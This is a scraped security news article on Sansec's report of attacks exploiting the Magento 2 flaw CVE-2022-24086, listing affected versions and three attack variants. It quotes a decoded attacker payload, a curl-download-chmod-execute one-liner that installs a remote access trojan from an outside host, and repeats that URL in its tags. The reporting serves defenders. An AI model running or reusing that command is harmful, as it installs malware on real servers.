# Surge in Magento 2 template attacks exploiting the CVE-2022-24086 flaw
## Sansec researchers warn of a surge in hacking attempts targeting a critical Magento 2 vulnerability tracked as CVE-2022-24086. Sansec researchers are warning of a hacking campaign targeting the CVE-2022-24086 Magento 2 vulnerability. Magento is a popular open-source e-commerce platform owned by Adobe, which is used by hundreds of thousands of e-stores worldwide. In February, Adobe […]
## Information:

+ Link: https://securityaffairs.co/wordpress/136112/hacking/magento-2-cve-2022-24086.html
+ Source: Security Affairs
+ Author: Pierluigi Paganini
+ Date published: 23 September 2022, 13:54
+ Date scraped: 23 September 2022, 14:00

## Article:
![Main article image](https://i0.wp.com/securityaffairs.co/wordpress/wp-content/uploads/2022/02/magento-vector-logo.png?resize=300%2C300&ssl=1)


Sansec researchers are warning of a hacking campaign targeting the [CVE-2022-24086](https://securityaffairs.co/wordpress/127999/hacking/cve-2022-24086-zero-day.html) Magento 2 vulnerability. 


Magento is a popular open-source e-commerce platform owned by Adobe, which is used by hundreds of thousands of e-stores worldwide.


In February, Adobe rolled out security updates to address the critical [CVE-2022-24086](https://helpx.adobe.com/security/products/magento/apsb22-12.html) flaw affecting its Commerce and Magento Open Source products, at the time, the company confirmed it was actively exploited in the wild.


*“Adobe is aware that CVE-2022-24086 has been exploited in the wild in very limited attacks targeting Adobe Commerce merchants.” [reads](https://helpx.adobe.com/security/products/magento/apsb22-12.html)the advisory published by Adobe.*


The flaw is an “improper input validation” vulnerability that could be exploited by threat actors with administrative privileges to achieve arbitrary code execution on vulnerable systems.


The CVE-2022-24086 has received a CVSS score of 9.8 out of 10, it is classified as a pre-authentication issue which means that it could be exploited without credentials.


The vulnerability affects the following versions of the products:




| **PRODUCT** | **VERSION** | **PLATFORM** |
| --- | --- | --- |
|  Adobe Commerce | 2.4.3-p1 and earlier versions   | All |
| 2.3.7-p2 and earlier versions   | All |
| Magento Open Source | 2.4.3-p1 and earlier versions        | All |
| 2.3.7-p2 and earlier versions | All |




Adobe Commerce 2.3.3 and lower are not affected by this vulnerability.


A few days after its disclosure, Positive Technologies researchers [created](https://securityaffairs.co/wordpress/128144/security/magento-cve-2022-24086-bug-poc.html) a working PoC exploit for the vulnerability.


Now Sansec researchers are warning of a new wave of attacks targeting the Magento 2 vulnerability, the security firm detailed


Sansec’s researchers have detailed three attack variants exploiting [CVE-2022-24086](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24086) to inject a malware on vulnerable systems. All the attacks analyzed by the security firm have been interactive, possibly because the Magento checkout flow is very hard to automate.


The first attack pattern detailed by the experts starts by creating a new customer account and an order placement on the vulnerable system. The attackers use a malicious template code in the first and last names and to place the order.


*“It starts with the creation of a new customer account and an order placement, which may result in a failed payment.” [reads the Sansec report](https://sansec.io/research/magento-2-template-attacks). “The `sales_order_address` table now contains a record with malicious template code, which decodes to:*



```
cd pub;cd media;curl https://theroots.in/pub/media/avatar/223sam.jpg **-o** cli &&chmod +x cli&&./cli;
```

The code downloads a Linux executable called “223sam.jpg” and launches it as a background process called cli, which is a Remote Access Trojan (RAT). The malware run in memory and creates a state file lg000, then polls a remote server hosted in Bulgaria for commands.


Experts pointed out that the RAT has full access to the database and the running PHP processes.


Sansec detailed a variant of the above attack, which injects the health\_check.php backdoor. The attacker injects the placed order containing a specific template code in the VAT field.


[![magento](https://i0.wp.com/securityaffairs.co/wordpress/wp-content/uploads/2022/09/magento-attack.jpg?resize=1024%2C426&ssl=1)](https://i0.wp.com/securityaffairs.co/wordpress/wp-content/uploads/2022/09/magento-attack.jpg?ssl=1)


The code creates a the file “pub/media/health\_check.php” that accepts commands via POST requests.


A third attack variation of the attack replaces generated/code/Magento/Framework/App/FrontController/Interceptor.php with a tainted version.


Follow me on Twitter: [**@securityaffairs**](https://twitter.com/securityaffairs) and [**Facebook**](https://www.facebook.com/sec.affairs)




|  |  |
| --- | --- |
|  |  |




[**Pierluigi Paganini**](http://www.linkedin.com/pub/pierluigi-paganini/b/742/559)


**(**[**SecurityAffairs**](http://securityaffairs.co/wordpress/)**–** **hacking, Log4Shell)**





 
  


---


  




## Tags:
***CVE's***: CVE-2022-24086
***urls***: https://theroots.in/pub/media/avatar/223sam.jpg

### Autogenerated tags:
sansec cve-2022-24086 magento
